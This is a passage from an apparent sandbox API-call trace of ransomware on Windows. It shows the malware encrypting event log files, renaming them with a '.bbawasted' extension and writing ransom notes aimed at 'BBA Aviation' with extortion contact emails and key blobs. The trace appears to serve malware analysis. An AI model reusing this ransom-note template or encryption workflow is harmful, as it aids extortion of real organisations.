szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6708) returned 1 [0192.279] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0192.279] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0192.279] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0192.279] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0192.438] SetEndOfFile (hFile=0x28c) returned 1 [0192.438] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0192.438] lstrcpyW (in: lpString1=0x6aed4a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0192.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.bbawasted")) returned 1 [0192.439] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0192.439] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0192.440] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0192.440] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0192.440] CloseHandle (hObject=0x280) returned 1 [0192.447] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0192.448] CloseHandle (hObject=0x294) returned 1 [0192.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0192.448] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6020) returned 1 [0192.449] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0192.449] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0192.449] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6708) returned 1 [0192.449] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0192.449] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0192.461] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0192.461] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0192.461] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0192.461] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]D5inzSxAtvygKUVobhjQYTcACFI7WgrnasgCpQYwTA57itfWnyxoWoy8scBbnNI6\r\nq1GF+i+77stELQGdVBqvV69k7YvpNJdwas1JTKWSZOBExt0ivySYA4T61PdofbBm\r\n6o+Cxa6iIjJSJrQispOMphKxAjyDSjEbOApL9deLRo19SMWXKtcPgmOjSVP9oZpz\r\nNqB6TL9jAodtzwZvF9v7COMAA0L5qXiC6+jdhH4NEoBjJVB2yv8592igHrIEZlt2\r\nuz1wsGLlZuu9beMGau391U+6GhSFZRS/54nElisxvg0Fx7C72owJDTOsbgh7n1j2\r\nDY5tqK4MDPKBb9ttqOasUSzsHjhfBHdx1mU7QTkOmPPHpJu1fPNIOBg9ZLWgy7gg\r\nQ7iLzYjuxdgfJu1b3ikth3wTz9/Kc48MrEl5FYppk2ULKx+Nu01qWu0Kiz9utNzu\r\n4Krx3WQ7g+xS618gWxZVDulUM+3srWsS4a/8dyIoxstbzgOArx4OL7QipZT04xXN\r\nKe6HYaaJbqCLnwie+6NzaDB/5C5KBSzEQlWxTLqHXabEUSZr5xVUtk4nGajUrm2j\r\nFb0PNjbpxtmKB/vXXHzTFaVITKga9aNhfMd9bz9s1ytWtvx1g5lLLKOwnPAj9df1\r\n7ijeal9zbEreRK5/twcN2cV6y66/6dCoychbQICgqQm=[end_key]\r\nKEEP IT\r\n") returned 984 [0192.461] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0192.461] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0192.462] SetEndOfFile (hFile=0x28c) returned 1 [0192.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0192.465] CloseHandle (hObject=0x28c) returned 1 [0192.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0192.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9b98 | out: hHeap=0x660000) returned 1 [0192.469] _aulldvrm () returned 0x0 [0192.469] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6928) returned 1 [0192.469] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0192.469] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0192.469] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 51 [0192.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x270) returned 0x6aecf0 [0192.470] lstrcpyW (in: lpString1=0x6aed56, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0192.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0192.470] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f98) returned 1 [0192.471] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0192.471] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0192.471] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0192.611] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0192.613] SetEndOfFile (hFile=0x28c) returned 1 [0192.613] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0192.613] lstrcpyW (in: lpString1=0x6aed56, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0192.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.bbawasted")) returned 1 [0192.614] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0192.614] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0192.615] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0192.615] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0192.615] CloseHandle (hObject=0x294) returned 1 [0192.630] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0192.630] CloseHandle (hObject=0x280) returned 1 [0192.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0192.630] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0192.631] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0192.631] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0192.631] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a69b0) returned 1 [0192.632] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0192.632] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0192.643] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0192.643] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0192.643] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0192.643] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]AF5qUDo9bT4lkOqN3SMMz97M0i9hXX3ADpXFTux/e7brJLQ+L/2SNSTeMmXzxtZB\r\nYAo2UarrWfIvlqh9V/PHETyo9NaEB8ESgSbW1xHqj+pPdvpKn4RjXUPmaCG4IxYg\r\nZ8uURmD1fNAJXyUgh/pLnKOMAjND+B/V0YXkzTWMGWoS8CGH/rTcnBzgO8ufzRLt\r\nJ4hmXD00I0ATs1NZ5Xn683RVW2WMvS5UH10jZUHu+SdHLeokuV+9bnwkOvohrXRU\r\nRetjjub+JPA0zfYXWKxldMAt4JYe1FsBpXYzsuXoqdLAKU7TJDZVuyvpvhqesAtE\r\n3joZn7a0czecTmr6jVyTmW1ZtXr3NjPhU6V3qfX7mg5AviXvFU2c3MYENnyWp3ZX\r\nc8qK8HL0A1tQgPL9w+1TUOQV+dWIjbhnvd+NafIwYA/um1PLRz4+BQ0UpskPrhOF\r\n8wqnD8kncLsQfGa4rVH/M4m083jUh923kVw/X1Y37dFVdp2Qjf77imdl/FwXnGXI\r\neM0KHNUrDwSx91KSsnUuixhAJ0rpaf91+ts8XgAJjMCNQNY3cZ6ApsXtX3IajmlR\r\nhFYgB+8xtnpVddLlMpXw37PgbflAKyBb0DQXj4VNSepWqfXCK/gCcHZhRrD5dbLZ\r\niG5EQEbG74fjftT684Zkq5MuVWgL5x1liapxczP04xX=[end_key]\r\nKEEP IT\r\n") returned 984 [0192.643] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0192.643] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0192.643] SetEndOfFile (hFile=0x28c) returned 1 [0192.646] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0192.646] CloseHandle (hObject=0x28c) returned 1 [0192.652] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0192.652] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1fb8 | out: hHeap=0x660000) returned 1 [0192.653] _aulldvrm () returned 0x0 [0192.653] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6130) returned 1 [0192.653] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0192.653] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0192.653] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 52 [0192.653] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6aecf0 [0192.654] lstrcpyW (in: lpString1=0x6aed58, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0192.654] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0192.654] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0192.654] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0192.654] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0192.654] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0192.655] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0192.994] SetEndOfFile (hFile=0x28c) returned 1 [0192.994] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0192.994] lstrcpyW (in: lpString1=0x6aed58, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0192.994] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.bbawasted")) returned 1 [0192.996] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0192.996] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0192.996] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0192.996] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0192.996] CloseHandle (hObject=0x280) returned 1 [0193.022] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0193.023] CloseHandle (hObject=0x294) returned 1 [0193.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0193.023] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0193.024] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0193.024] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0193.024] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6c58) returned 1 [0193.024] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0193.024] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0193.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0193.035] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0193.133] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0193.133] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]AWgA0uj2SV/5Br/2cLYd9I/5ym0L95PinsTiQCVBrajcCnaI9SbI3dCSSzLfotDd\r\nsmYYnoBiSa2pBfcN85ZVmwV0PQ5xN+oKAOq9JQZarPRiAcG6HqIxVpjVDVvDvxia\r\nJoWwR7wDApLdTrQvCj7bNOs9ZfPCHGJodsrqW842y3IPG8mtdZ7QgXFkok4sNcPs\r\nNx6ScuaD+L5l4v5skOuixBXiOUKORoJZI8npCgusVVdU0zLP2nw5PIV24YwtI9PN\r\n7/Vpw3ysKo/l4dW52y8fxkJ6inMeQiNSmOvWgviCeFocBwkx2jWF6z1qkUqvb9bf\r\nZMLEBW/WY7vGbG0mXUJXd8bnSSucmcBA24PqttNiqkYE3WdDV9J8beugIG0rER5k\r\n0Vt/BidII8s/yDCegT0gk0tO2rXF5YGpOjiCktaS2vqz8GF0LvS4nwIBtmHrHAbh\r\naqGGKbXlUKgpYNwzeYfuv6LKbUpqmpwHPV8q+KhnIHOxwn2QV0QW7iQIlgwdZ1ad\r\ntse3fPNOzTHNt2VB6+bce5y75PA7OgpUX6QbAoI8x59dQxfE4wuORMTM30xClTTt\r\nOITDfEiQapdEb479HnUuevT7CfVwhFMSMgJly3ZFX4UmyIxAxS781oVkV+GvN3vS\r\npZOEYeh0xADmrozgzr0Lx11AROmenjVz7YZjiMQVVeY=[end_key]\r\nKEEP IT\r\n") returned 984 [0193.133] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0193.133] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0193.133] SetEndOfFile (hFile=0x28c) returned 1 [0193.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0193.136] CloseHandle (hObject=0x28c) returned 1 [0193.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0193.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9c50 | out: hHeap=0x660000) returned 1 [0193.139] _aulldvrm () returned 0x0 [0193.139] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0193.139] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0193.139] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0193.139] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 62 [0193.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x286) returned 0x6aecf0 [0193.140] lstrcpyW (in: lpString1=0x6aed6c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0193.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0193.140] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0193.140] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0193.140] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0193.140] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0193.141] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0193.143] SetEndOfFile (hFile=0x28c) returned 1 [0193.143] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0193.143] lstrcpyW (in: lpString1=0x6aed6c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0193.143] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.bbawasted")) returned 1 [0193.144] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0193.144] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0193.144] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0193.144] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0193.144] CloseHandle (hObject=0x294) returned 1 [0193.406] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0193.411] CloseHandle (hObject=0x280) returned 1 [0193.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0193.411] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6bd0) returned 1 [0193.412] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x689e38 